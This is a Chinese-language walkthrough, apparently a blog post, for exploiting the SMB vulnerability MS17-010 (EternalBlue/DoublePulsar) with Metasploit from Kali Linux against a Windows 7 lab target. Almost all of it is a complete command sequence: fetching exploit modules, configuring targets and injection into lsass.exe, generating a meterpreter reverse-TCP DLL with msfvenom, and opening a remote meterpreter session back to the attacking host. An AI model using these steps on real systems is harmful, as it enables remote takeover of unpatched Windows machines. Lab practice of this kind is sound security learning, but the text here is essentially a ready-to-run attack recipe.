smb(ms17-010)遠端命令執行之msf
1.本次用到的環境:
kali(2016.2)32位系統.ip地址:192.168.1.104
目標靶機為:win7sp1x64系統(關閉防火牆),ip地址:192.168.1.105
具體的步驟如下:
kali系統下安裝wine32:
apt-get install wine32
用wine32執行cmd.exe
wine cmd.exe
exit //退出
git clone下載其利用指令碼:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
然後將指令碼拷貝到 /usr/share/metasploit-framework/modules/exploits/windows/smb
cd Eternalblue-Doublepulsar-Metasploit/
cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
啟動msf,然後進行一系列設定:
service postgresql start
msfconsole
search eternalblue
use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe set TARGETARCHITECTURE x64 set rhost 192.168.1.105 show targets set target 9 set payload windows/x64/meterpreter/reverse_tcp show options set lhost 192.168.1.104 exploit
2.附錄:
msf下的ms17-010模組:
前提條件:
1. gem install ruby_smb #ruby_smb模組安裝
2.msfupdate #msf的更新
3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue" #啟動並載入模組
[email protected]:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb [email protected]:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb Use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8 msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21 msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp msf exploit(ms17_010_eternalblue) >exploit Meterpreter> sysinfo
3.搭環境:
kali 192.168.0.10
攻擊機win7 192.168.0.4 目標機
kali首先安裝wine32
apt-get install wine32 (dpkg --add-architecture i386 && apt-get update && apt-get install wine32)
wine cmd.exe
exitwine cmd.exe
下載exp檔案git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
將 eternalblue_doublepulsar.rb 放到 /usr/share/metasploit-framework/modules/exploits/windows/smb/
生成dll
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.10 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll
啟動msfconsole 執行reload_all 重新載入模組
use exploit/windows/smb/eternalblue_doublepulsarset rhost 192.168.0.4set payload windows/meterpreter/reverse_tcpset lhost 192.168.0.10set lport 4444
exploit
注: x86系統要執行 set PROCESSINJECT lsass.exe (PROCESSINJECT lsass.exe wlms.exe yes Name of process to inject into (Change to lsass.exe for x64))
參考l
http://www.cnblogs.com/backlion/p/6804863.html
https://zhuanlan.zhihu.com/p/26770020?utm_source=qq